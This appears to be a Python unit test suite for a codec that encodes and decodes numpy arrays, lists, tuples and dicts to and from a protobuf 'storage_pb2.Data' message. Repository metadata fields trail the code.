# ndarray tests
#
##############################################################################
def test_encode_one_float_elem_scalar_ndarray(self):
"""Ensures that np arrays with shape 0 can be encoded in our proto."""
a = np.array(1.5, dtype=np.float32)
expected = storage_pb2.Data()
datum = expected.datum
datum.values.float_values_buffer = a.astype('>f').tobytes()
self.assertEqual(codec.encode(a), expected)
def test_encode_one_float_elem_ndarray(self):
"""Ensures that np float32 arrays can be encoded in our proto."""
a = np.array([1.5], dtype=np.float32)
expected = storage_pb2.Data()
datum = expected.datum
datum.shape.dim.add().size = 1
datum.values.float_values_buffer = a.astype('>f').tobytes()
self.assertEqual(codec.encode(a), expected)
def test_identity_one_float_elem_ndarray(self):
"""Ensures that np float32 arrays can be written and read back."""
a = np.array(1.5, dtype=np.float32)
np.testing.assert_equal(codec.decode(codec.encode(a)), a)
def test_decode_one_float_elem_ndarray(self):
"""Once encoded, the proto should be decodeable."""
user_data = storage_pb2.Data()
user_data.datum.shape.dim.add().size = 1
user_data.datum.values.float_values.append(0.1512)
np.testing.assert_equal(
codec.decode(user_data), np.array([0.1512], dtype=np.float32))
def test_decode_one_float_elem_ndarray_buffer(self):
"""Tests that we get a Python list from a float32 buffer."""
user_data = storage_pb2.Data()
user_data.datum.shape.dim.add().size = 1
# 3.141519 in big-endian byte array.
user_data.datum.values.float_values_buffer = b'\x40\x49\x0f\xd0'
decoded = codec.decode(user_data)
self.assertEqual(decoded.dtype, np.float32)
np.testing.assert_equal(decoded, np.array([3.14159], dtype=np.float32))
def test_encode_one_double_elem_scalar_ndarray(self):
"""Ensures that np arrays with shape 0 can be encoded in our proto."""
expected = storage_pb2.Data()
datum = expected.datum
datum.values.double_values.append(512.123)
self.assertEqual(
codec.encode(np.array(512.123, dtype=np.float64)), expected)
def test_encode_one_double_elem_ndarray(self):
"""Ensures that np float64 arrays can be encoded in our proto."""
expected = storage_pb2.Data()
datum = expected.datum
datum.shape.dim.add().size = 1
datum.values.double_values.append(512.123)
self.assertEqual(
codec.encode(np.array([512.123], dtype=np.float64)), expected)
def test_decode_one_double_elem_ndarray(self):
"""Once encoded, the proto should be decodeable."""
user_data = storage_pb2.Data()
user_data.datum.shape.dim.add().size = 1
user_data.datum.values.double_values.append(0.63661)
np.testing.assert_equal(
codec.decode(user_data), np.array([0.63661], dtype=np.float64))
def test_encode_multiple_double_elem_ndarray(self):
"""Ensures that np float64 multi-element arrays can be encoded."""
expected = storage_pb2.Data()
datum = expected.datum
datum.shape.dim.add().size = 2
datum.values.double_values.extend([987.654, 321.098])
self.assertEqual(codec.encode(np.array([987.654, 321.098])), expected)
def test_decode_multiple_double_elem_ndarray(self):
"""Once encoded, the proto should be decodeable."""
user_data = storage_pb2.Data()
user_data.datum.shape.dim.add().size = 3
user_data.datum.values.double_values.extend([0.74048, 2.09455, 0.69314])
np.testing.assert_equal(
codec.decode(user_data),
np.array([0.74048, 2.09455, 0.69314], dtype=np.float64))
def test_encode_one_int32_elem_scalar_ndarray(self):
"""Ensures that np arrays with shape 0 can be encoded in our proto."""
expected = storage_pb2.Data()
datum = expected.datum
datum.values.int32_values.append(415)
self.assertEqual(codec.encode(np.array(415, dtype=np.int32)), expected)
def test_encode_one_int32_elem_ndarray(self):
"""Ensures that np int32 arrays can be encoded in our proto."""
expected = storage_pb2.Data()
datum = expected.datum
datum.shape.dim.add().size = 1
datum.values.int32_values.append(415)
self.assertEqual(codec.encode(np.array([415], dtype=np.int32)), expected)
def test_decode_one_int32_elem_ndarray(self):
"""Once encoded, the proto should be decodeable."""
user_data = storage_pb2.Data()
user_data.datum.shape.dim.add().size = 1
user_data.datum.values.int32_values.append(9)
np.testing.assert_equal(
codec.decode(user_data), np.array([9], dtype=np.int32))
def test_encode_one_int64_elem_scalar_ndarray(self):
"""Ensures that np arrays with shape 0 can be encoded in our proto."""
expected = storage_pb2.Data()
datum = expected.datum
datum.values.int64_values.append(415)
self.assertEqual(codec.encode(np.array(415, dtype=np.int64)), expected)
def test_encode_one_int64_elem_ndarray(self):
"""Ensures that np int64 arrays can be encoded in our proto."""
expected = storage_pb2.Data()
datum = expected.datum
datum.shape.dim.add().size = 1
datum.values.int64_values.append(415)
self.assertEqual(codec.encode(np.array([415])), expected)
def test_encode_multiple_int64_elem_ndarray(self):
"""Ensures that np int64 multi-element arrays can be encoded."""
expected = storage_pb2.Data()
datum = expected.datum
datum.shape.dim.add().size = 2
datum.values.int64_values.extend([123, 456])
self.assertEqual(codec.encode(np.array([123, 456])), expected)
def test_decode_one_int64_elem_ndarray(self):
"""Once encoded, the proto should be decodeable."""
user_data = storage_pb2.Data()
user_data.datum.shape.dim.add().size = 1
user_data.datum.values.int64_values.append(9)
np.testing.assert_equal(
codec.decode(user_data), np.array([9], dtype=np.int64))
def test_decode_multiple_int64_elem_ndarray(self):
"""Once encoded, the proto should be decodeable."""
user_data = storage_pb2.Data()
user_data.datum.shape.dim.add().size = 3
user_data.datum.shape.dim.add().size = 2
user_data.datum.values.int64_values.extend([6, 5, 4, 3, 2, 1])
np.testing.assert_equal(
codec.decode(user_data),
np.array([[6, 5], [4, 3], [2, 1]], dtype=np.int64))
def test_encode_one_uint32_elem_scalar_ndarray(self):
"""Ensures that np arrays with shape 0 can be encoded in our proto."""
expected = storage_pb2.Data()
datum = expected.datum
datum.values.uint32_values.append(415)
self.assertEqual(codec.encode(np.array(415, dtype=np.uint32)), expected)
def test_encode_one_uint32_elem_ndarray(self):
"""Ensures that np uint32 arrays can be encoded in our proto."""
expected = storage_pb2.Data()
datum = expected.datum
datum.shape.dim.add().size = 1
datum.values.uint32_values.append(415)
self.assertEqual(codec.encode(np.array([415], dtype=np.uint32)), expected)
def test_decode_one_uint32_elem_ndarray(self):
"""Once encoded, the proto should be decodeable."""
user_data = storage_pb2.Data()
user_data.datum.shape.dim.add().size = 1
user_data.datum.values.uint32_values.append(9)
np.testing.assert_equal(
codec.decode(user_data), np.array([9], dtype=np.uint32))
def test_encode_one_uint64_elem_scalar_ndarray(self):
"""Ensures that np arrays with shape 0 can be encoded in our proto."""
expected = storage_pb2.Data()
datum = expected.datum
datum.values.uint64_values.append(415)
self.assertEqual(codec.encode(np.array(415, dtype=np.uint64)), expected)
def test_encode_one_uint64_elem_ndarray(self):
"""Ensures that np uint64 arrays can be encoded in our proto."""
expected = storage_pb2.Data()
datum = expected.datum
datum.shape.dim.add().size = 1
datum.values.uint64_values.append(415)
self.assertEqual(codec.encode(np.array([415], dtype=np.uint64)), expected)
def test_decode_one_uint64_elem_ndarray(self):
"""Once encoded, the proto should be decodeable."""
user_data = storage_pb2.Data()
user_data.datum.shape.dim.add().size = 1
user_data.datum.values.uint64_values.append(9)
np.testing.assert_equal(
codec.decode(user_data), np.array([9], dtype=np.uint64))
def test_encode_one_bool_elem_scalar_ndarray(self):
"""Ensures that np arrays with shape 0 can be encoded in our proto."""
expected = storage_pb2.Data()
datum = expected.datum
datum.values.bool_values.append(True)
self.assertEqual(codec.encode(np.array(True, dtype=np.bool)), expected)
def test_encode_one_bool_elem_ndarray(self):
"""Ensures that np bool arrays can be encoded in our proto."""
expected = storage_pb2.Data()
datum = expected.datum
datum.shape.dim.add().size = 1
datum.values.bool_values.append(True)
self.assertEqual(codec.encode(np.array([True], dtype=np.bool)), expected)
def test_decode_one_bool_elem_ndarray(self):
"""Once encoded, the proto should be decodeable."""
user_data = storage_pb2.Data()
user_data.datum.shape.dim.add().size = 1
user_data.datum.values.bool_values.append(True)
np.testing.assert_equal(
codec.decode(user_data), np.array([True], dtype=np.bool))
def test_encode_one_string_elem_scalar_ndarray(self):
"""Ensures that np arrays with shape 0 can be encoded in our proto."""
expected = storage_pb2.Data()
datum = expected.datum
datum.values.string_values.append('dream theater')
self.assertEqual(codec.encode(np.array('dream theater')), expected)
def test_encode_one_string_elem_ndarray(self):
"""Ensures that np string arrays can be encoded in our proto."""
expected = storage_pb2.Data()
datum = expected.datum
datum.shape.dim.add().size = 1
datum.values.string_values.append('rachmaninov')
self.assertEqual(codec.encode(np.array(['rachmaninov'])), expected)
def test_decode_one_string_elem_ndarray(self):
"""Once encoded, the proto should be decodeable."""
user_data = storage_pb2.Data()
user_data.datum.shape.dim.add().size = 1
user_data.datum.values.string_values.append('scriabin')
np.testing.assert_equal(codec.decode(user_data), np.array(['scriabin']))
def test_encode_one_bytes_elem_scalar_ndarray(self):
"""Ensures that np arrays with shape 0 can be encoded in our proto."""
expected = storage_pb2.Data()
datum = expected.datum
datum.values.bytes_values.append(b'a1b2c3d4e5f6')
self.assertEqual(codec.encode(np.array(b'a1b2c3d4e5f6')), expected)
def test_encode_one_bytes_elem_ndarray(self):
"""Ensures that np bytes arrays can be encoded in our proto."""
expected = storage_pb2.Data()
datum = expected.datum
datum.shape.dim.add().size = 1
datum.values.bytes_values.append(b'a1b2c3d4e5f6')
self.assertEqual(codec.encode(np.array([b'a1b2c3d4e5f6'])), expected)
def test_decode_one_bytes_elem_ndarray(self):
"""Once encoded, the proto should be decodeable."""
user_data = storage_pb2.Data()
user_data.datum.shape.dim.add().size = 1
user_data.datum.values.bytes_values.append(b'6f5e4d3c2b1a')
np.testing.assert_equal(
codec.decode(user_data), np.array([b'6f5e4d3c2b1a']))
def test_encode_one_int_elem_scalar_ndarray(self):
"""Ensures that ndarrays with dtype==object raise an error."""
self.assertRaises(TypeError, codec.encode,
np.array(12345678901234567890, dtype=object))
def test_decode_one_int_elem_ndarray(self):
"""Ensures that non-scalar Datums with dtype==object raise an error."""
user_data = storage_pb2.Data()
user_data.datum.shape.dim.add().size = 1
user_data.datum.values.bigint_values.append(
b'\000\253T\251\214\353\037\n\322')
self.assertRaises(TypeError, codec.decode, user_data)
def test_encode_one_int8_elem_scalar_ndarray(self):
"""Ensures that np arrays with shape 0 can be encoded in our proto."""
expected = storage_pb2.Data()
datum = expected.datum
datum.values.int8_values = b'\x85'
self.assertEqual(codec.encode(np.array(-123, dtype=np.int8)), expected)
def test_encode_one_int8_elem_ndarray(self):
"""Ensures that np int8 arrays can be encoded in our proto."""
expected = storage_pb2.Data()
datum = expected.datum
datum.shape.dim.add().size = 1
datum.values.int8_values = b'\x85'
self.assertEqual(codec.encode(np.array([-123], dtype=np.int8)), expected)
def test_encode_two_int8_elem_ndarray(self):
"""Ensures that np int8 2-element arrays can be encoded in our proto."""
expected = storage_pb2.Data()
datum = expected.datum
datum.shape.dim.add().size = 2
datum.values.int8_values = b'\x85\x84'
self.assertEqual(
codec.encode(np.array([-123, -124], dtype=np.int8)), expected)
def test_decode_one_int8_elem_ndarray(self):
"""Once encoded, the proto should be decodeable."""
user_data = storage_pb2.Data()
user_data.datum.shape.dim.add().size = 1
user_data.datum.values.int8_values = b'\x91'
decoded = codec.decode(user_data)
self.assertEqual(decoded.dtype, np.int8)
np.testing.assert_equal(decoded, np.array([-111], dtype=np.int8))
def test_decode_two_int8_elem_ndarray(self):
"""Once encoded, the proto should be decodeable."""
user_data = storage_pb2.Data()
user_data.datum.shape.dim.add().size = 2
user_data.datum.values.int8_values = b'\xa1\xb2'
np.testing.assert_equal(
codec.decode(user_data), np.array([-95, -78], dtype=np.int8))
def test_encode_one_int16_elem_scalar_ndarray(self):
"""Ensures that np arrays with shape 0 can be encoded in our proto."""
expected = storage_pb2.Data()
datum = expected.datum
datum.values.int16_values = b'\xfe\xa7'
self.assertEqual(codec.encode(np.array(-345, dtype=np.int16)), expected)
def test_encode_one_int16_elem_ndarray(self):
"""Ensures that np int16 arrays can be encoded in our proto."""
expected = storage_pb2.Data()
datum = expected.datum
datum.shape.dim.add().size = 1
datum.values.int16_values = b'\xfe\xa7'
self.assertEqual(codec.encode(np.array([-345], dtype=np.int16)), expected)
def test_encode_two_int16_elem_ndarray(self):
"""Ensures that np int16 2-element arrays can be encoded in our proto."""
expected = storage_pb2.Data()
datum = expected.datum
datum.shape.dim.add().size = 2
datum.values.int16_values = b'\xfe\xa7\xfe\xa6'
self.assertEqual(
codec.encode(np.array([-345, -346], dtype=np.int16)), expected)
def test_decode_one_int16_elem_ndarray(self):
"""Once encoded, the proto should be decodeable."""
user_data = storage_pb2.Data()
user_data.datum.shape.dim.add().size = 1
user_data.datum.values.int16_values = b'\xfe\xa7'
decoded = codec.decode(user_data)
self.assertEqual(decoded.dtype, np.int16)
np.testing.assert_equal(decoded, np.array([-345], dtype=np.int16))
def test_decode_two_int16_elem_ndarray(self):
"""Once encoded, the proto should be decodeable."""
user_data = storage_pb2.Data()
user_data.datum.shape.dim.add().size = 2
user_data.datum.values.int16_values = b'\xa1\xb2\xc3\xd4'
np.testing.assert_equal(
codec.decode(user_data), np.array([-24142, -15404], dtype=np.int16))
def test_encode_one_uint8_elem_scalar_ndarray(self):
"""Ensures that np arrays with shape 0 can be encoded in our proto."""
expected = storage_pb2.Data()
datum = expected.datum
datum.values.uint8_values = b'\x7b'
self.assertEqual(codec.encode(np.array(123, dtype=np.uint8)), expected)
def test_encode_one_uint8_elem_ndarray(self):
"""Ensures that np uint8 arrays can be encoded in our proto."""
expected = storage_pb2.Data()
datum = expected.datum
datum.shape.dim.add().size = 1
datum.values.uint8_values = b'\x7b'
self.assertEqual(codec.encode(np.array([123], dtype=np.uint8)), expected)
def test_encode_two_uint8_elem_ndarray(self):
"""Ensures that np uint8 arrays can be encoded in our proto."""
expected = storage_pb2.Data()
datum = expected.datum
datum.shape.dim.add().size = 2
datum.values.uint8_values = b'\x7b\x7a'
self.assertEqual(
codec.encode(np.array([123, 122], dtype=np.uint8)), expected)
def test_decode_one_uint8_elem_ndarray(self):
"""Once encoded, the proto should be decodeable."""
user_data = storage_pb2.Data()
user_data.datum.shape.dim.add().size = 1
user_data.datum.values.uint8_values = b'\xa1'
np.testing.assert_equal(
codec.decode(user_data), np.array([161], dtype=np.uint8))
def test_decode_two_uint8_elem_ndarray(self):
"""Once encoded, the proto should be decodeable."""
user_data = storage_pb2.Data()
user_data.datum.shape.dim.add().size = 2
user_data.datum.values.uint8_values = b'\xa1\xb2'
np.testing.assert_equal(
codec.decode(user_data), np.array([161, 178], dtype=np.uint8))
def test_encode_one_uint16_elem_scalar_ndarray(self):
"""Ensures that np arrays with shape 0 can be encoded in our proto."""
expected = storage_pb2.Data()
datum = expected.datum
datum.values.uint16_values = b'\x01Y'
self.assertEqual(codec.encode(np.array(345, dtype=np.uint16)), expected)
def test_encode_one_uint16_elem_ndarray(self):
"""Ensures that np uint16 arrays can be encoded in our proto."""
expected = storage_pb2.Data()
datum = expected.datum
datum.shape.dim.add().size = 1
datum.values.uint16_values = b'\x01Y'
self.assertEqual(codec.encode(np.array([345], dtype=np.uint16)), expected)
def test_encode_two_uint16_elem_ndarray(self):
"""Ensures that np uint16 2-element arrays can be encoded in our proto."""
expected = storage_pb2.Data()
datum = expected.datum
datum.shape.dim.add().size = 2
datum.values.uint16_values = b'\x01Y\x01X'
self.assertEqual(
codec.encode(np.array([345, 344], dtype=np.uint16)), expected)
def test_decode_one_uint16_elem_ndarray(self):
"""Once encoded, the proto should be decodeable."""
user_data = storage_pb2.Data()
user_data.datum.shape.dim.add().size = 1
user_data.datum.values.uint16_values = b'\xa1\xb2'
np.testing.assert_equal(
codec.decode(user_data), np.array([41394], dtype=np.uint16))
def test_decode_two_uint16_elem_ndarray(self):
user_data = storage_pb2.Data()
user_data.datum.shape.dim.add().size = 2
user_data.datum.values.uint16_values = b'\xa1\xb2\xc3\xd4'
np.testing.assert_equal(
codec.decode(user_data), np.array([41394, 50132], dtype=np.uint16))
# Multi-dimensional arrays.
def test_encode_2d_int64_elem_ndarray(self):
"""A 2D np int64 array should also be reprentable."""
expected = storage_pb2.Data()
datum = expected.datum
datum.shape.dim.add().size = 2
datum.shape.dim.add().size = 3
datum.values.int64_values.extend([1, 3, 5, 7, 9, 11])
self.assertEqual(codec.encode(np.array([[1, 3, 5], [7, 9, 11]])), expected)
def test_encode_2d_double_elem_ndarray(self):
"""A 2D np float64 array should also be reprentable."""
expected = storage_pb2.Data()
datum = expected.datum
datum.shape.dim.add().size = 3
datum.shape.dim.add().size = 2
datum.values.double_values.extend([10.0, 8.0, 6.0, 4.0, 2.0, 0.0])
self.assertEqual(
codec.encode(np.array([[10.0, 8.0], [6.0, 4.0], [2.0, 0.0]])), expected)
##############################################################################
#
# Array of np arrays tests
#
##############################################################################
# float64
def test_encode_one_double_elem_ndarray_list(self):
"""A list of one np float64 array should be representable."""
expected = storage_pb2.Data()
datum = expected.array.values.add().datum
datum.shape.dim.add().size = 1
datum.values.double_values.append(3.14)
self.assertEqual(codec.encode([np.array([3.14])]), expected)
def test_encode_multiple_double_elem_ndarray_list(self):
"""A list of one multidimensional np int64 array should be representable."""
expected = storage_pb2.Data()
datum = expected.array.values.add().datum
datum.shape.dim.add().size = 5
datum.values.double_values.extend([0.0, 0.25, 0.5, 0.75, 1.0])
self.assertEqual(
codec.encode([np.array([0.0, 0.25, 0.5, 0.75, 1.0])]), expected)
def test_decode_double_elem_ndarray_list(self):
user_data = storage_pb2.Data()
datum1 = user_data.array.values.add().datum
datum1.shape.dim.add().size = 1
datum1.values.double_values.append(1.2345)
datum2 = user_data.array.values.add().datum
datum2.shape.dim.add().size = 2
datum2.values.double_values.extend([4.567, 8.9011])
datum3 = user_data.array.values.add().datum
datum3.shape.dim.add().size = 3
datum3.shape.dim.add().size = 1
datum3.values.double_values.extend([9.8765, 4.321, -0.12345])
decoded = codec.decode(user_data)
self.assertLen(decoded, 3)
self.assertIsInstance(decoded, list)
np.testing.assert_equal(decoded[0], np.array([1.2345], dtype=np.float64))
np.testing.assert_equal(decoded[1],
np.array([4.567, 8.9011], dtype=np.float64))
np.testing.assert_equal(
decoded[2], np.array([[9.8765], [4.321], [-0.12345]], dtype=np.float64))
# int64
def test_encode_one_int64_elem_ndarray_list(self):
"""A list of one np int64 array should be representable."""
expected = storage_pb2.Data()
datum = expected.array.values.add().datum
datum.shape.dim.add().size = 1
datum.values.int64_values.append(719)
self.assertEqual(codec.encode([np.array([719])]), expected)
def test_encode_multiple_int64_elem_ndarray_list(self):
"""A list of one multidimensional np int64 array should be representable."""
expected = storage_pb2.Data()
datum = expected.array.values.add().datum
datum.shape.dim.add().size = 5
datum.values.int64_values.extend([1, 1, 2, 3, 5])
self.assertEqual(codec.encode([np.array([1, 1, 2, 3, 5])]), expected)
def test_decode_int64_elem_ndarray_list(self):
user_data = storage_pb2.Data()
datum1 = user_data.array.values.add().datum
datum1.shape.dim.add().size = 1
datum1.values.int64_values.append(1000)
datum2 = user_data.array.values.add().datum
datum2.shape.dim.add().size = 2
datum2.values.int64_values.extend([2000, 3000])
datum3 = user_data.array.values.add().datum
datum3.shape.dim.add().size = 3
datum3.shape.dim.add().size = 1
datum3.values.int64_values.extend([4000, 5000, 6000])
decoded = codec.decode(user_data)
self.assertLen(decoded, 3)
self.assertIsInstance(decoded, list)
np.testing.assert_equal(decoded[0], np.array([1000], dtype=np.int64))
np.testing.assert_equal(decoded[1], np.array([2000, 3000], dtype=np.int64))
np.testing.assert_equal(decoded[2],
np.array([[4000], [5000], [6000]], dtype=np.int64))
##############################################################################
#
# Tuple tests
#
##############################################################################
def test_encode_one_double_elem_ndarray_tuple(self):
"""Tuples of np float64 arrays should be representable."""
expected = storage_pb2.Data()
datum = expected.tuple.values.add().datum
datum.shape.dim.add().size = 1
datum.values.double_values.append(-1 / 12)
self.assertEqual(codec.encode((np.array([-1 / 12]),)), expected)
def test_encode_multiple_double_elem_ndarray_tuple(self):
"""Tuples of np float64 arrays should be representable."""
expected = storage_pb2.Data()
datum = expected.tuple.values.add().datum
datum.shape.dim.add().size = 2
datum.values.double_values.extend([6.28, 2.71828])
self.assertEqual(codec.encode((np.array([6.28, 2.71828]),)), expected)
def test_decode_double_elem_ndarray_tuple(self):
"""Once encoded, the proto should be decodeable."""
user_data = storage_pb2.Data()
datum1 = user_data.tuple.values.add().datum
datum1.shape.dim.add().size = 1
datum1.values.double_values.append(1.2345)
datum2 = user_data.tuple.values.add().datum
datum2.shape.dim.add().size = 2
datum2.values.double_values.extend([4.567, 8.9011])
datum3 = user_data.tuple.values.add().datum
datum3.shape.dim.add().size = 3
datum3.shape.dim.add().size = 1
datum3.values.double_values.extend([9.8765, 4.321, -0.12345])
decoded = codec.decode(user_data)
self.assertLen(decoded, 3)
self.assertIsInstance(decoded, tuple)
np.testing.assert_equal(decoded[0], np.array([1.2345], dtype=np.float64))
np.testing.assert_equal(decoded[1],
np.array([4.567, 8.9011], dtype=np.float64))
np.testing.assert_equal(
decoded[2], np.array([[9.8765], [4.321], [-0.12345]], dtype=np.float64))
def test_encode_one_int64_elem_ndarray_tuple(self):
"""Tuples of np int64 arrays should be representable."""
expected = storage_pb2.Data()
datum = expected.tuple.values.add().datum
datum.shape.dim.add().size = 1
datum.values.int64_values.append(1729)
self.assertEqual(codec.encode((np.array([1729]),)), expected)
def test_encode_multiple_int64_elem_ndarray_tuple(self):
"""Tuples of np int64 arrays should be representable."""
expected = storage_pb2.Data()
datum = expected.tuple.values.add().datum
datum.shape.dim.add().size = 6
datum.values.int64_values.extend([2, 3, 5, 7, 9, 11])
self.assertEqual(codec.encode((np.array([2, 3, 5, 7, 9, 11]),)), expected)
def test_decode_int64_elem_ndarray_tuple(self):
user_data = storage_pb2.Data()
datum1 = user_data.tuple.values.add().datum
datum1.shape.dim.add().size = 1
datum1.values.int64_values.append(1000)
datum2 = user_data.tuple.values.add().datum
datum2.shape.dim.add().size = 2
datum2.values.int64_values.extend([2000, 3000])
datum3 = user_data.tuple.values.add().datum
datum3.shape.dim.add().size = 3
datum3.shape.dim.add().size = 1
datum3.values.int64_values.extend([4000, 5000, 6000])
decoded = codec.decode(user_data)
self.assertLen(decoded, 3)
self.assertIsInstance(decoded, tuple)
np.testing.assert_equal(decoded[0], np.array([1000], dtype=np.int64))
np.testing.assert_equal(decoded[1], np.array([2000, 3000], dtype=np.int64))
np.testing.assert_equal(decoded[2],
np.array([[4000], [5000], [6000]], dtype=np.int64))
##############################################################################
#
# Dict tests
#
##############################################################################
def test_encode_int64_elem_ndarray_dict(self):
"""Dict of int64 and of other dicts."""
expected = storage_pb2.Data()
d = expected.dict.values
datum1 = d['good'].datum
datum1.shape.dim.add().size = 1
datum1.values.int64_values.append(1)
datum2 = d['bad'].datum
datum2.shape.dim.add().size = 1
datum2.values.int64_values.append(-1)
# Dict also supports nested dicts.
datum3 = d['nested_dict'].dict.values['cumulants'].datum
datum3.shape.dim.add().size = 2
datum3.values.int64_values.extend([1000, -2])
self.assertEqual(
codec.encode({
'good': np.array([1]),
'bad': np.array([-1]),
'nested_dict': {
'cumulants': np.array([1000, -2])
}
}), expected)
def test_encode_double_elem_ndarray_dict(self):
"""Dicts of np arrays."""
expected = storage_pb2.Data()
d = expected.dict.values
datum1 = d['golden'].datum
datum1.shape.dim.add().size = 1
datum1.values.double_values.append(1.618)
datum2 = d['sqrt2'].datum
datum2.shape.dim.add().size = 1
datum2.values.double_values.append(1.41421)
self.assertEqual(
codec.encode({
'golden': np.array([1.618]),
'sqrt2': np.array([1.41421])
}), expected)
def test_encode_mixed_elem_ndarray_dict(self):
"""Dicts of np arrays of different dtypes."""
expected = storage_pb2.Data()
d = expected.dict.values
datum1 = d['mozart_death'].datum
datum1.shape.dim.add().size = 1
datum1.values.int64_values.append(35)
datum2 = d['sqrt3'].datum
datum2.shape.dim.add().size = 1
datum2.values.double_values.append(1.73205)
self.assertEqual(
codec.encode({
'mozart_death': np.array([35]),
'sqrt3': np.array([1.73205])
}), expected)
def test_decode_dict(self):
user_data = storage_pb2.Data()
datum1 = user_data.dict.values['pi'].datum
datum1.shape.dim.add().size = 1
datum1.values.double_values.append(3.14159265)
datum2 = user_data.dict.values['primes'].datum
datum2.shape.dim.add().size = 5
datum2.values.int64_values.extend([2, 3, 5, 7, 11])
datum3 = user_data.dict.values['negative_squares_doubles'].datum
datum3.shape.dim.add().size = 5
datum3.shape.dim.add().size = 2
datum3.values.int64_values.extend(
[-1, -4, -9, -16, -25, -2, -8, -18, -32, -50])
decoded = codec.decode(user_data)
self.assertIsInstance(decoded, dict)
self.assertIn('pi', decoded)
np.testing.assert_equal(decoded['pi'],
np.array([3.14159265], dtype=np.float64))
self.assertIn('primes', decoded)
np.testing.assert_equal(decoded['primes'],
np.array([2, 3, 5, 7, 11], dtype=np.int64))
self.assertIn('negative_squares_doubles', decoded)
np.testing.assert_equal(
decoded['negative_squares_doubles'],
np.array([[-1, -4], [-9, -16], [-25, -2], [-8, -18], [-32, -50]],
dtype=np.int64))
def test_encode_dict_int_keys(self):
"""Dict with Python int keys."""
expected = storage_pb2.Data()
d = expected.dict.kvs
t1 = d.values.add().tuple
k1 = t1.values.add().datum
k1.shape.dim.add().size = -438
k1.values.bigint_values.append(b'{') # 123 == b'{'
v1 = t1.values.add().datum
v1.shape.dim.add().size = -438
v1.values.int64_values.append(456)
self.assertEqual(codec.encode({123: np.int64(456)}), expected)
def test_decode_dict_int_keys(self):
"""Dict with Python int keys."""
user_data = storage_pb2.Data()
d = user_data.dict.kvs
t1 = d.values.add().tuple
k1 = t1.values.add().datum
k1.shape.dim.add().size = -438
k1.values.bigint_values.append(b'{') # 123 == b'{'
v1 = t1.values.add().datum
v1.shape.dim.add().size = -438
v1.values.int64_values.append(456)
self.assertEqual(codec.decode(user_data), {123: np.int64(456)})
def test_identity_dict_int_keys(self):
"""Dict with Python int keys."""
self.assertEqual(
codec.decode(codec.encode({123: np.int64(456)})), {123: np.int64(456)})
def test_encode_dict_int64_keys(self):
"""Dict with Python int64 keys."""
expected = storage_pb2.Data()
d = expected.dict.kvs
t1 = d.values.add().tuple
k1 = t1.values.add().datum
k1.shape.dim.add().size = -438
k1.values.int64_values.append(np.int64(1729))
v1 = t1.values.add().datum
v1.shape.dim.add().size = -438
v1.values.int32_values.append(12345)
self.assertEqual(codec.encode({np.int64(1729): np.int32(12345)}), expected)
def test_decode_dict_int64_keys(self):
"""Dict with Python int64 keys."""
user_data = storage_pb2.Data()
d = user_data.dict.kvs
t1 = d.values.add().tuple
k1 = t1.values.add().datum
k1.shape.dim.add().size = -438
k1.values.int64_values.append(np.int64(1729))
v1 = t1.values.add().datum
v1.shape.dim.add().size = -438
v1.values.int32_values.append(12345)
self.assertEqual(codec.decode(user_data), {np.int64(1729): np.int32(12345)})
def test_identity_dict_int64_keys(self):
"""Dict with Python int keys."""
self.assertEqual(
codec.decode(codec.encode({np.int64(1729): np.int32(12345)})),
{np.int64(1729): np.int32(12345)})
def test_identity_dict_mixed_keytypes(self):
"""Dict with Python mixed key types."""
data = {123: np.int64(456), np.int64(1729): np.int32(12345), 'hello': True}
self.assertEqual(codec.decode(codec.encode(data)), data)
##############################################################################
#
# Unsupported types tests
#
##############################################################################
@parameterized.named_parameters(
('modules_are_not_supported', np),
('classes_are_not_supported', set),
('functions_are_not_supported', map),
('type_classes_are_not_supported', type(int)),
('sets_are_not_supported', set()),
('complex_numbers_are_not_supported', complex(1, 2)),
)
def test_unsupported_types(self, arg):
"""Ensures that TypeError is raised when an unsupported type is encoded."""
self.assertRaises(TypeError, codec.encode, arg)
if __name__ == '__main__':
absltest.main()
| 41.185768
| 82
| 0.644298
| 8,676
| 65,403
| 4.718303
| 0.050715
| 0.040453
| 0.035201
| 0.048002
| 0.883721
| 0.838919
| 0.785299
| 0.749927
| 0.720002
| 0.704881
| 0
| 0.054762
| 0.160711
| 65,403
| 1,587
| 83
| 41.21172
| 0.690993
| 0.148357
| 0
| 0.577578
| 0
| 0.001794
| 0.055259
| 0.007704
| 0
| 0
| 0
| 0
| 0.221525
| 1
| 0.138117
| false
| 0
| 0.004484
| 0
| 0.143498
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
71f9cf5917f141144e5f8fddb7f9c0b1f2cb2e01
| 105
|
py
|
Python
|
tests/test_dummy.py
|
adamgreig/saltbot
|
f6e991ff4c41447c6e7564b297560e79f3976b5e
|
[
"MIT"
] | 1
|
2021-01-15T04:47:20.000Z
|
2021-01-15T04:47:20.000Z
|
tests/test_dummy.py
|
adamgreig/saltbot
|
f6e991ff4c41447c6e7564b297560e79f3976b5e
|
[
"MIT"
] | 17
|
2015-01-18T06:02:55.000Z
|
2015-03-11T02:46:18.000Z
|
tests/test_dummy.py
|
adamgreig/saltbot
|
f6e991ff4c41447c6e7564b297560e79f3976b5e
|
[
"MIT"
] | null | null | null |
from nose.tools import assert_true
class TestDummy:
def test_good(self):
assert_true(True)
| 15
| 34
| 0.714286
| 15
| 105
| 4.8
| 0.8
| 0.277778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.219048
| 105
| 6
| 35
| 17.5
| 0.878049
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.25
| false
| 0
| 0.25
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 6
|
9c000d3ec02a5d009f4ffab25b0fb9667b62c830
| 37,088
|
py
|
Python
|
tfjs-converter/python/tensorflowjs/converters/tf_saved_model_conversion_v2_test.py
|
xhcao/tfjs
|
1a2e5dc1dcb475e6f503e55543c790a5d4df075f
|
[
"Apache-2.0"
] | null | null | null |
